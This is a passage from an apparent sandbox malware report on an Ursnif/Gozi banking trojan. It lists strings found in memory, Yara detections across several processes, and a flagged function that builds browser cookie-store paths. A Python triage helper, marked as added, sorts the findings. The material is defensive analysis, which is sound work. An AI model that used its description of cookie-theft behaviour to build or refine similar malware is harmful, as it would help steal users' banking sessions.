            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp String found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp String found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
            Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
            Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

            E-Banking Fraud:

            Detected Gozi e-Banking trojan
            Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_028231EC
            Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_028231EC
            Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_028231EC
            Yara detected Ursnif
            Source: Yara match File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
            Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
            Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
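            The string list above and the "Yara match" / "Code function" entries are read very differently in practice: almost every URL comes from data explorer.exe maps anyway (Internet Explorer's built-in search-provider table with its favicon entries and "ie8search"/"IE8Activity" markers, font-vendor URLs embedded in font files, and placeholder hosts such as contoso.com or oneget.org from PowerShell module manifests), while the Yara hits in loaddll32.exe, powershell.exe, explorer.exe and the RuntimeBroker.exe instances, and the loaddll32.exe function that builds "\cookie.ff" / "\cookie.ie" paths around CreateDirectoryW and DeleteFileW, are the actual Ursnif behaviour. The following triage helper is an added example, not part of the Joe Sandbox report: it parses the three line shapes on this page, buckets each URL, pairs a bare homepage with a favicon entry from the same memory dump, and pulls out the Yara-hit processes and the flagged code function. The allowlists (FONT_VENDORS, MODULE_HOSTS) and the "ie-default" heuristic are analyst assumptions, not labels the report provides; the dump-name fields are kept opaque because the page does not define them.

```python
"""Triage of the 'Source: ...' signature lines above. Added example, not part of
the sandbox report. Three line shapes are parsed:
  Source: <proc>, <dump>.sdmp String found in binary or memory: <url>
  Source: Yara match File source: <dump>.sdmp | Process Memory Space: <proc> PID: <n>
  Source: <file> Code function: <api>,<api>,..., <string> <proc>_<dump>_<addr>"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: lines copied from the report above ('&amp;' decoded).
SAMPLE = r"""
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Yara match File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_028231EC
"""

LINE_RE = re.compile(r"^\s*Source:\s*(?P<src>.*?)\s*(?P<kind>String found in binary or memory"
                     r"|File source|Code function):\s*(?P<detail>.*?)\s*$")
DUMP_RE = re.compile(r"[0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]+){5}\.sdmp")
# '<apis>, <matched string> <proc>_<dump>_<address>' as the report prints it
FUNC_RE = re.compile(r"^(?P<apis>[\w,]+),\s*(?P<string>.*?)\s+(?P<fid>\d+_\d+_[0-9A-Fa-f]+)$")
STRING_KIND = "String found in binary or memory"
# Assumption (analyst allowlists, not from the report): font-file metadata that
# explorer.exe maps, and placeholder hosts from PowerShell module manifests.
FONT_VENDORS = {"fontbureau.com", "fonts.com", "typography.net", "urwpp.de",
                "sakkal.com", "tiro.com", "sandoll.co.kr", "goodfont.co.kr",
                "jiyu-kobo.co.jp", "founder.com.cn", "zhongyicts.com.cn",
                "galapagosdesign.com", "carterandcone.com", "sajatypeworks.com"}
MODULE_HOSTS = {"contoso.com", "oneget.org", "nuget.org", "apache.org"}


def split_sources(src):
    """'proc, dump, proc, dump' -> [(proc, dump)]; anything else -> [(src, None)]."""
    parts = [p.strip() for p in src.split(",")]
    if len(parts) % 2 == 0 and all(DUMP_RE.fullmatch(p) for p in parts[1::2]):
        return list(zip(parts[0::2], parts[1::2]))
    return [(src, None)]


def classify_url(url, paired_hosts=()):
    """Bucket a URL; 'review' means an analyst still has to look at it."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    in_set = lambda doms: any(host == d or host.endswith("." + d) for d in doms)
    # IE's built-in search providers: favicon entries, the 'ie8search'/'IE8Activity'
    # markers, and a bare homepage whose host has a favicon entry in the same dump
    if (parts.path.lower().endswith(".ico") or "ie8search" in url or "IE8Activity" in url
            or (parts.path == "/" and host in paired_hosts)):
        return "ie-default"
    if in_set(FONT_VENDORS):
        return "font-metadata"
    if in_set(MODULE_HOSTS):
        return "module-metadata"
    return "review"          # deliberately no wholesale allowlist for github.com etc.


def triage(report_text):
    rows = [m.group("src", "kind", "detail") for m in map(LINE_RE.match, report_text.splitlines()) if m]
    ico_hosts = defaultdict(set)                          # dump -> hosts that have a .ico string
    for src, kind, detail in rows:
        if kind == STRING_KIND and urlsplit(detail).path.lower().endswith(".ico"):
            for _, dump in split_sources(src):
                ico_hosts[dump].add((urlsplit(detail).hostname or "").lower())
    urls, per_source = defaultdict(set), defaultdict(lambda: defaultdict(int))
    yara_dumps, yara_procs, code_functions = set(), set(), []
    for src, kind, detail in rows:
        if kind == STRING_KIND:
            for proc, dump in split_sources(src):
                bucket = classify_url(detail, ico_hosts[dump])
                urls[bucket].add(detail)
                per_source[(proc, dump)][bucket] += 1
        elif kind == "File source":
            pm = re.match(r"Process Memory Space:\s*(\S+)\s+PID:\s*(\d+)", detail)
            dm = DUMP_RE.search(detail)
            if pm:
                yara_procs.add((pm.group(1), int(pm.group(2))))
            elif dm:
                yara_dumps.add(dm.group(0))
        elif kind == "Code function" and (fm := FUNC_RE.match(detail)):
            apis, text, flags = set(fm.group("apis").split(",")), fm.group("string"), []
            if "cookie" in text.lower():                      # Firefox / IE cookie store path
                flags.append("browser-cookie-path")
            if {"CreateDirectoryW", "DeleteFileW"} <= apis:   # stages a directory, deletes a file
                flags.append("creates-dir-and-deletes-file")
            code_functions.append({"file": src, "fid": fm.group("fid"), "string": text, "flags": flags})
    return {"url_counts": {b: len(s) for b, s in urls.items()},
            "review": sorted(urls.get("review", ())),
            "per_source": {k: dict(v) for k, v in per_source.items()},
            "yara_dumps": sorted(yara_dumps), "yara_procs": sorted(yara_procs),
            "code_functions": code_functions}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run against the full list above, the "review" bucket is what is left for a human: the search-engine homepages that happen to have no favicon entry in the same dump, github.com (never allowlisted wholesale, since it hosts staging payloads as readily as Pester), and oddities like docUrl.com. Nothing in it is evidence of command-and-control; the Yara-hit process set and the cookie-path code function carry that weight, and the next step is to pull the 0x2810000 region of loaddll32.exe (dump 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, which contains function 0_2_028231EC) for static analysis.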
            Source: Yara match